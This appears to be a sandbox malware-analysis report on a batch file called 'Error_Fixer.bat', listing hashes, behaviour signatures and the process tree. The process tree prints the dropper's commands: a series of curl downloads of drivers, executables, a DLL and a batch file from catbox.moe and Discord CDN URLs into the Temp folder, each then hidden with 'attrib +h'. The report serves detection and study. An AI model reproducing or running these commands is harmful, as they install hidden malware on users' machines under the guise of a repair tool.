Analysis
-
max time kernel
11s -
max time network
14s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241023-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
11-11-2024 14:34
Behavioral task
behavioral1
Sample
Error_Fixer.bat
Resource
win10ltsc2021-20241023-en
General
-
Target
Error_Fixer.bat
-
Size
4KB
-
MD5
0f0eeac1ee1ca486d3ba81dce6232a84
-
SHA1
a199064741781c5a3594b0a01f4f48f1f96da459
-
SHA256
7b58ae949a5c584d2cf3763fa0117bcbc3fddec0e080862b43c466ab5812e140
-
SHA512
0666c250932b843bd0747812d2bf49e96e21f95eafb332108940f96eb6694cbc9753f2cfbf53c0d693798482c166499165df910c169a8a10808c21cfea3c2a54
-
SSDEEP
96:biskkc0rjx0rwZA0rseo0refTrp0r/5VOY0rha0rIQ0reveK0roz0rdmWj0rT3DI:biskkc0rjx0rwZA0rseo0reLrp0rzOYT
Malware Config
Signatures
-
Downloads MZ/PE file
-
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4332 wrote to memory of 4016 4332 cmd.exe 83 PID 4332 wrote to memory of 4016 4332 cmd.exe 83 PID 4332 wrote to memory of 3732 4332 cmd.exe 85 PID 4332 wrote to memory of 3732 4332 cmd.exe 85 PID 4332 wrote to memory of 3660 4332 cmd.exe 86 PID 4332 wrote to memory of 3660 4332 cmd.exe 86 PID 4332 wrote to memory of 4488 4332 cmd.exe 89 PID 4332 wrote to memory of 4488 4332 cmd.exe 89 PID 4332 wrote to memory of 1524 4332 cmd.exe 90 PID 4332 wrote to memory of 1524 4332 cmd.exe 90 PID 4332 wrote to memory of 1720 4332 cmd.exe 92 PID 4332 wrote to memory of 1720 4332 cmd.exe 92 PID 4332 wrote to memory of 2792 4332 cmd.exe 93 PID 4332 wrote to memory of 2792 4332 cmd.exe 93 PID 4332 wrote to memory of 3816 4332 cmd.exe 95 PID 4332 wrote to memory of 3816 4332 cmd.exe 95 PID 4332 wrote to memory of 3112 4332 cmd.exe 96 PID 4332 wrote to memory of 3112 4332 cmd.exe 96 PID 4332 wrote to memory of 460 4332 cmd.exe 97 PID 4332 wrote to memory of 460 4332 cmd.exe 97 PID 4332 wrote to memory of 2216 4332 cmd.exe 98 PID 4332 wrote to memory of 2216 4332 cmd.exe 98 PID 4332 wrote to memory of 4348 4332 cmd.exe 99 PID 4332 wrote to memory of 4348 4332 cmd.exe 99 PID 4332 wrote to memory of 3296 4332 cmd.exe 100 PID 4332 wrote to memory of 3296 4332 cmd.exe 100 PID 4332 wrote to memory of 4820 4332 cmd.exe 101 PID 4332 wrote to memory of 4820 4332 cmd.exe 101 PID 4332 wrote to memory of 744 4332 cmd.exe 102 PID 4332 wrote to memory of 744 4332 cmd.exe 102 PID 4332 wrote to memory of 4084 4332 cmd.exe 103 PID 4332 wrote to memory of 4084 4332 cmd.exe 103 PID 4332 wrote to memory of 4748 4332 cmd.exe 104 PID 4332 wrote to memory of 4748 4332 cmd.exe 104 PID 4332 wrote to memory of 3344 4332 cmd.exe 105 PID 4332 wrote to memory of 3344 4332 cmd.exe 105 PID 4332 wrote to memory of 2244 4332 cmd.exe 106 PID 4332 wrote to memory of 2244 4332 cmd.exe 106 PID 4332 wrote to memory of 1760 4332 cmd.exe 107 PID 4332 wrote to memory of 1760 4332 cmd.exe 107 PID 4332 wrote to memory of 1400 4332 cmd.exe 108 PID 4332 wrote to memory of 1400 4332 cmd.exe 108 PID 4332 wrote to memory of 408 4332 cmd.exe 109 PID 4332 wrote to memory of 408 4332 cmd.exe 109 PID 4332 wrote to memory of 2932 4332 cmd.exe 110 PID 4332 wrote to memory of 2932 4332 cmd.exe 110 PID 4332 wrote to memory of 2556 4332 cmd.exe 111 PID 4332 wrote to memory of 2556 4332 cmd.exe 111 PID 4332 wrote to memory of 1316 4332 cmd.exe 112 PID 4332 wrote to memory of 1316 4332 cmd.exe 112 PID 4332 wrote to memory of 1644 4332 cmd.exe 113 PID 4332 wrote to memory of 1644 4332 cmd.exe 113 PID 4332 wrote to memory of 3592 4332 cmd.exe 114 PID 4332 wrote to memory of 3592 4332 cmd.exe 114 PID 4332 wrote to memory of 3728 4332 cmd.exe 115 PID 4332 wrote to memory of 3728 4332 cmd.exe 115 PID 4332 wrote to memory of 1892 4332 cmd.exe 116 PID 4332 wrote to memory of 1892 4332 cmd.exe 116 PID 4332 wrote to memory of 2788 4332 cmd.exe 117 PID 4332 wrote to memory of 2788 4332 cmd.exe 117 PID 4332 wrote to memory of 3536 4332 cmd.exe 118 PID 4332 wrote to memory of 3536 4332 cmd.exe 118 PID 4332 wrote to memory of 3740 4332 cmd.exe 119 PID 4332 wrote to memory of 3740 4332 cmd.exe 119 -
Views/modifies file attributes 1 TTPs 16 IoCs
pid Process 1760 attrib.exe 2556 attrib.exe 1644 attrib.exe 3732 attrib.exe 4348 attrib.exe 4820 attrib.exe 3344 attrib.exe 2788 attrib.exe 3740 attrib.exe 4488 attrib.exe 4084 attrib.exe 408 attrib.exe 3728 attrib.exe 1720 attrib.exe 3816 attrib.exe 460 attrib.exe -
cURL User-Agent 16 IoCs
Uses User-Agent string associated with cURL utility.
description flow ioc HTTP User-Agent header 28 curl/8.7.1 HTTP User-Agent header 31 curl/8.7.1 HTTP User-Agent header 39 curl/8.7.1 HTTP User-Agent header 43 curl/8.7.1 HTTP User-Agent header 49 curl/8.7.1 HTTP User-Agent header 6 curl/8.7.1 HTTP User-Agent header 47 curl/8.7.1 HTTP User-Agent header 48 curl/8.7.1 HTTP User-Agent header 23 curl/8.7.1 HTTP User-Agent header 26 curl/8.7.1 HTTP User-Agent header 45 curl/8.7.1 HTTP User-Agent header 50 curl/8.7.1 HTTP User-Agent header 32 curl/8.7.1 HTTP User-Agent header 33 curl/8.7.1 HTTP User-Agent header 51 curl/8.7.1 HTTP User-Agent header 52 curl/8.7.1
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Error_Fixer.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4332 -
C:\Windows\system32\curl.execurl "https://files.catbox.moe/53lsww.sys" --output "C:\Users\Admin\AppData\Local\Temp\AeeccSV1X64.sys"2⤵PID:4016
-
-
C:\Windows\system32\attrib.exeattrib +h "C:\Users\Admin\AppData\Local\Temp\AeeccSV1X64.sys"2⤵
- Views/modifies file attributes
PID:3732
-
-
C:\Windows\system32\curl.execurl "https://files.catbox.moe/2auxo6.sys" --output "C:\Users\Admin\AppData\Local\Temp\AfkzzV1X64.sys"2⤵PID:3660
-
-
C:\Windows\system32\attrib.exeattrib +h "C:\Users\Admin\AppData\Local\Temp\AfkzzV1X64.sys"2⤵
- Views/modifies file attributes
PID:4488
-
-
C:\Windows\system32\curl.execurl "https://files.catbox.moe/2auxo6.sys" --output "C:\Users\Admin\AppData\Local\Temp\SxeaaV1X64.sys"2⤵PID:1524
-
-
C:\Windows\system32\attrib.exeattrib +h "C:\Users\Admin\AppData\Local\Temp\SxeaaV1X64.sys"2⤵
- Views/modifies file attributes
PID:1720
-
-
C:\Windows\system32\curl.execurl "https://cdn.discordapp.com/attachments/1112031522426462218/1290816653851889674/fb4953.exe?ex=66fdd630&is=66fc84b0&hm=ddd23031710a90877555b97441d6a6c841dcefb8b5f0c8ae6934f5461224878b&" --output "C:\Users\Admin\AppData\Local\Temp\fb4953.exe"2⤵PID:2792
-
-
C:\Windows\system32\attrib.exeattrib +h "C:\Users\Admin\AppData\Local\Temp\fb4953.exe"2⤵
- Views/modifies file attributes
PID:3816
-
-
C:\Windows\system32\curl.execurl "https://cdn.discordapp.com/attachments/1112031522426462218/1290816654128840816/ss2031.exe?ex=66fdd630&is=66fc84b0&hm=bee0f45ce6f1cd78183751ce16c463d257a73191aaff40c31ec35658e68942c0&" --output "C:\Users\Admin\AppData\Local\Temp\ss2031.exe"2⤵PID:3112
-
-
C:\Windows\system32\attrib.exeattrib +h "C:\Users\Admin\AppData\Local\Temp\ss2031.exe"2⤵
- Views/modifies file attributes
PID:460
-
-
C:\Windows\system32\curl.execurl "https://cdn.discordapp.com/attachments/1112031522426462218/1290816654476841031/db3289.exe?ex=66fdd630&is=66fc84b0&hm=d9b3162be67de7afbb7005cab595210eb9b2573072607457502343127074b441&" --output "C:\Users\Admin\AppData\Local\Temp\db3289.exe"2⤵PID:2216
-
-
C:\Windows\system32\attrib.exeattrib +h "C:\Users\Admin\AppData\Local\Temp\db3289.exe"2⤵
- Views/modifies file attributes
PID:4348
-
-
C:\Windows\system32\curl.execurl "https://cdn.discordapp.com/attachments/1112031522426462218/1290817450715254869/iqvsw64e.cat?ex=66fdd6ee&is=66fc856e&hm=1c4c23b3398a45f1d68ea0f2a8f8a3d12be5cd8af0c361d5be1c7dc1154705f6&" --output "C:\Users\Admin\AppData\Local\Temp\iqvsw64e.cat"2⤵PID:3296
-
-
C:\Windows\system32\attrib.exeattrib +h "C:\Users\Admin\AppData\Local\Temp\iqvsw64e.cat"2⤵
- Views/modifies file attributes
PID:4820
-
-
C:\Windows\system32\curl.execurl "https://cdn.discordapp.com/attachments/1112031522426462218/1290817451172560997/iqvsw64e.inf?ex=66fdd6ee&is=66fc856e&hm=0035d48597abcd75dde99a54e085c2fa49f97ce0808b678f10a3ddedfc60ca07&" --output "C:\Users\Admin\AppData\Local\Temp\iqvsw64e.inf"2⤵PID:744
-
-
C:\Windows\system32\attrib.exeattrib +h "C:\Users\Admin\AppData\Local\Temp\iqvsw64e.inf"2⤵
- Views/modifies file attributes
PID:4084
-
-
C:\Windows\system32\curl.execurl "https://cdn.discordapp.com/attachments/1112031522426462218/1290817451725946943/iqvsw64e.sys?ex=66fdd6ee&is=66fc856e&hm=7bf1dc5baf23eb3aeebf279354f48c00b576de307a799565e6f1e155eb35428b&" --output "C:\Users\Admin\AppData\Local\Temp\iqvsw64e.sys"2⤵PID:4748
-
-
C:\Windows\system32\attrib.exeattrib +h "C:\Users\Admin\AppData\Local\Temp\iqvsw64e.sys"2⤵
- Views/modifies file attributes
PID:3344
-
-
C:\Windows\system32\curl.execurl "https://cdn.discordapp.com/attachments/1112031522426462218/1290817452082597960/eu4837.exe?ex=66fdd6ee&is=66fc856e&hm=d0521b201403836bae28b2b157bb108b0545c187508d3e25867f994bfd5cd36a&" --output "C:\Users\Admin\AppData\Local\Temp\eu4837.exe"2⤵PID:2244
-
-
C:\Windows\system32\attrib.exeattrib +h "C:\Users\Admin\AppData\Local\Temp\eu4837.exe"2⤵
- Views/modifies file attributes
PID:1760
-
-
C:\Windows\system32\curl.execurl "https://cdn.discordapp.com/attachments/1112031522426462218/1290817452392972338/i3782.bat?ex=66fdd6ee&is=66fc856e&hm=5ded14da6d4c18eb3c1536ec11c8a82e7f06d7adbf7f55f456361982f75aca0f&" --output "C:\Users\Admin\AppData\Local\Temp\i3782.bat"2⤵PID:1400
-
-
C:\Windows\system32\attrib.exeattrib +h "C:\Users\Admin\AppData\Local\Temp\i3782.bat"2⤵
- Views/modifies file attributes
PID:408
-
-
C:\Windows\system32\curl.execurl "https://cdn.discordapp.com/attachments/1112031522426462218/1290818347121901571/rn3987.exe?ex=66fdd7c4&is=66fc8644&hm=d46191124bae1eacd54dc1ed2d117d1a87c76d40efdbe31c51dfe08d6af10ccf&" --output "C:\Users\Admin\AppData\Local\Temp\rn3987.exe"2⤵PID:2932
-
-
C:\Windows\system32\attrib.exeattrib +h "C:\Users\Admin\AppData\Local\Temp\rn3987.exe"2⤵
- Views/modifies file attributes
PID:2556
-
-
C:\Windows\system32\curl.execurl "https://cdn.discordapp.com/attachments/1112031522426462218/1290820947791839253/RTloLib64.dll?ex=66fdda30&is=66fc88b0&hm=1ec68936e6bdc1f08b8dd9194ab515361e52dadac64ae2f0493bb633c0fe18ff&" --output "C:\Users\Admin\AppData\Local\Temp\RTIoLib64.dll"2⤵PID:1316
-
-
C:\Windows\system32\attrib.exeattrib +h "C:\Users\Admin\AppData\Local\Temp\RTIoLib64.dll"2⤵
- Views/modifies file attributes
PID:1644
-
-
C:\Windows\system32\curl.execurl "https://cdn.discordapp.com/attachments/1112031522426462218/1290818347809640589/rtkio64.sys?ex=66fdd7c4&is=66fc8644&hm=d5740800f8fdb4026e655b1a00c7d12e7dd30937aa7c9e58714679e5fddbb4f4&" --output "C:\Users\Admin\AppData\Local\Temp\rtkio64.sys"2⤵PID:3592
-
-
C:\Windows\system32\attrib.exeattrib +h "C:\Users\Admin\AppData\Local\Temp\rtkio64.sys"2⤵
- Views/modifies file attributes
PID:3728
-
-
C:\Windows\system32\curl.execurl "https://cdn.discordapp.com/attachments/1112031522426462218/1290818348233523303/rtkiow10x64.sys?ex=66fdd7c4&is=66fc8644&hm=799739568a5ba236a008ee1cf3a9739b6b814ba7b82d4df9263e30f1505d8a43&" --output "C:\Users\Admin\AppData\Local\Temp\rtkiow10x64.sys"2⤵PID:1892
-
-
C:\Windows\system32\attrib.exeattrib +h "C:\Users\Admin\AppData\Local\Temp\rtkiow10x64.sys"2⤵
- Views/modifies file attributes
PID:2788
-
-
C:\Windows\system32\curl.execurl "https://cdn.discordapp.com/attachments/1112031522426462218/1290821109918466121/Volumeid64.exe?ex=66fdda56&is=66fc88d6&hm=f046faf7bd86b36cae97cc026dcb2dd6139cdae9109ac8d9e277e03dfc04fac7&" --output "C:\Users\Admin\AppData\Local\Temp\Volumeid64.exe"2⤵PID:3536
-
-
C:\Windows\system32\attrib.exeattrib +h "C:\Users\Admin\AppData\Local\Temp\Volumeid64.exe"2⤵
- Views/modifies file attributes
PID:3740
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
36KB
MD59accebd928a8926fecf317f53cd1c44e
SHA1d7d71135cc3cf7320f8e63cefb6298dd44e5b1d4
SHA256811e5d65df60dfb8c6e1713da708be16d9a13ef8dfcd1022d8d1dda52ed057b2
SHA5122563402cc8e1402d9ac3a76a72b7dab0baa4ecd03629cc350e7199c7e1e1da4000e665bd02ac3a75fd9883fa678b924c8b73d88d8c50bf9d2ae59254a057911e
-
Filesize
18KB
MD5785045f8b25cd2e937ddc6b09debe01a
SHA1029c678674f482ababe8bbfdb93152392457109d
SHA25637073e42ffa0322500f90cd7e3c8d02c4cdd695d31c77e81560abec20bfb68ba
SHA51240bbeb41816146c7172aa3cf27dace538908b7955171968e1cddcd84403b2588e0d8437a3596c2714ccdf4476eefa3d4e61d90ea118982b729f50b03df1104a9
-
Filesize
36B
MD5a1ca4bebcd03fafbe2b06a46a694e29a
SHA1ffc88125007c23ff6711147a12f9bba9c3d197ed
SHA256c3fa59901d56ce8a95a303b22fd119cb94abf4f43c4f6d60a81fd78b7d00fa65
SHA5126fe1730bf2a6bba058c5e1ef309a69079a6acca45c0dbca4e7d79c877257ac08e460af741459d1e335197cf4de209f2a2997816f2a2a3868b2c8d086ef789b0e